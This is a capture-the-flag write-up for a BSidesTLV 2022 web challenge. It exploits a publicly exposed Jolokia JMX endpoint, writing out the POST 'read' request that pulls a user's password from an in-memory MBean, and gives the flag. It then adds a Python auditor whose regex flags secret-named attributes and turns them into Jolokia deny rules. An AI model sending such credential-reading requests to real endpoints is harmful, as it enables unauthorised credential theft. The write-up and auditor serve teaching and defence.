Tags: web
Running dirb on the provided list reveals that the Jolokia JMX endpoint is public.
After reading how this works, going to https://not-found.ctf.bsidestlv.com/jolokia/list reveals that all MBeans are available for use.
Searching the list shows that users are stored in an in-memory MBean:
`Users:database=UserDatabase,type=User,username=\"BSidesTLV2022\"`
There is a user with username=BSidesTLV2022 and a role: k1aNoYouCantBruteIt} which looks like part of the flag.
OK, another part is missing. Let's try to read the user's password with a POST request that reads from this MBean:
```
POST https://not-found.ctf.bsidestlv.com/jolokia/
{
  "type": "read",
  "mbean": "Users:database=UserDatabase,type=User,username=\"BSidesTLV2022\"",
  "operation": "findUser",
  "arguments": ["BSidesTLV2022"],
  "attribute": "password"
}
```
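The response reveals the second missing part. Its echoed `request` contains only `mbean`, `attribute` and `type`, so the `operation` and `arguments` fields were not needed for the read: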
`{"timestamp":1656402372,"status":200,"request":{"mbean":"Users:database=UserDatabase,type=User,username=\"BSidesTLV2022\"","attribute":"password","type":"read"},"value":"{J0l0k1aJ0l0k1aJ0l0"}`
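For the operator of such an endpoint, the same `list` output can be audited for secret-looking attributes and turned into `<deny>` entries for a `jolokia-access.xml` policy. This is an added example, not part of the original writeup; the sample response, the attribute names other than `password`, and the name pattern are constructed assumptions.

```python
import json
import re
from xml.sax.saxutils import escape

# Attribute names treated as secrets (assumed list for this example).
SENSITIVE = re.compile(r"passw(or)?d|secret|token|credential", re.I)

# Constructed sample shaped like a Jolokia "list" response:
# value -> domain -> key properties -> {"attr": {...}, "op": {...}}.
SAMPLE_LIST = json.dumps({"status": 200, "value": {
    "Users": {'database=UserDatabase,type=User,username="BSidesTLV2022"': {
        "attr": {"username": {"rw": True}, "password": {"rw": True},
                 "roles": {"rw": False}},
        "op": {"addRole": {"args": [], "ret": "void"}},
    }},
    "java.lang": {"type=Memory": {"attr": {"HeapMemoryUsage": {"rw": False}}}},
}})


def sensitive_attributes(list_json):
    """Return sorted (mbean, attribute, writable) for secret-looking attributes."""
    doc = json.loads(list_json)
    if doc.get("status") != 200:
        raise ValueError("not a successful Jolokia list response")
    hits = []
    for domain, mbeans in doc["value"].items():
        for props, info in mbeans.items():
            for attr, meta in info.get("attr", {}).items():
                if SENSITIVE.search(attr):
                    hits.append((f"{domain}:{props}", attr, bool(meta.get("rw"))))
    return sorted(hits)


def deny_rules(hits):
    """Render hits as <deny> entries for a jolokia-access.xml policy file."""
    rules = [f"    <mbean><name>{escape(m)}</name>"
             f"<attribute>{escape(a)}</attribute></mbean>" for m, a, _ in hits]
    return "\n".join(["<restrict>", "  <deny>", *rules, "  </deny>", "</restrict>"])


if __name__ == "__main__":
    found = sensitive_attributes(SAMPLE_LIST)
    print(found)
    print(deny_rules(found))
```

Denying individual attributes is a second layer only; the endpoint itself should not be reachable without authentication.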